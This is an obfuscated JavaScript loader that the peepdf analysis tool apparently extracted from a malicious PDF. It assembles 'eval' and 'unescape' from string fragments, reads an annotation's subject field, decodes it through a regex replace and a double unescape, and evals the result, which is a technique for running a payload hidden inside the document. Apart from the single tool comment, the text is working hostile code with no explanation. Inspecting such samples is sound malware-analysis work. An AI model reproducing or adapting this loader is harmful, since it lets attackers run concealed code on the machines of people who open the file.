// peepdf comment: Javascript code located in object 8 (version 0)

var wIivQeXNJg89 = new Array("LifeForLife", "e", "%", "a", "ZEN", "DAO", "o", "s", "c", "i", "g", "t", "r", "u", "n");
var eRfqWDMcqE77 = this;
var AGDUcWJTvk1 = wIivQeXNJg89[1];
var TqZiUTtEnV3 = wIivQeXNJg89[2];
var AqnOSHanUT17 = eRfqWDMcqE77[AGDUcWJTvk1 + "v" + wIivQeXNJg89[3] + "l"];
var OIZmcqHiOO18 = eRfqWDMcqE77[wIivQeXNJg89[13] + wIivQeXNJg89[14] + AGDUcWJTvk1 + "s" + wIivQeXNJg89[8] + wIivQeXNJg89[3] + "p" + AGDUcWJTvk1];


AqnOSHanUT17("v" + wIivQeXNJg89[3] + "r nGXTQVGXGT15 = /" + AGDUcWJTvk1 + wIivQeXNJg89[3] + "/" + wIivQeXNJg89[9] + wIivQeXNJg89[10] + ";");
var hDhcuJfpcB10 = app["d" + wIivQeXNJg89[6] + wIivQeXNJg89[8]];
hDhcuJfpcB10[wIivQeXNJg89[7] + "yn" + wIivQeXNJg89[8] + "Anno" + wIivQeXNJg89[11] + "S" + wIivQeXNJg89[8] + wIivQeXNJg89[3] + "n"]();


var RnbUIErRXn4 = hDhcuJfpcB10[wIivQeXNJg89[10] + AGDUcWJTvk1 + "tAnn" + wIivQeXNJg89[6] + wIivQeXNJg89[11] + wIivQeXNJg89[7]](0);
var CBIvyVwMwY5 = RnbUIErRXn4[0][wIivQeXNJg89[7] + "ubj" + AGDUcWJTvk1 + wIivQeXNJg89[8] + wIivQeXNJg89[11]];
var aQPAzkUtoH6 = CBIvyVwMwY5[wIivQeXNJg89[12] + AGDUcWJTvk1 + "pl" + wIivQeXNJg89[3] + wIivQeXNJg89[8] + AGDUcWJTvk1](nGXTQVGXGT15, TqZiUTtEnV3);
OGuqbDuSVS7 = OIZmcqHiOO18(OIZmcqHiOO18(aQPAzkUtoH6));
AqnOSHanUT17(OGuqbDuSVS7);

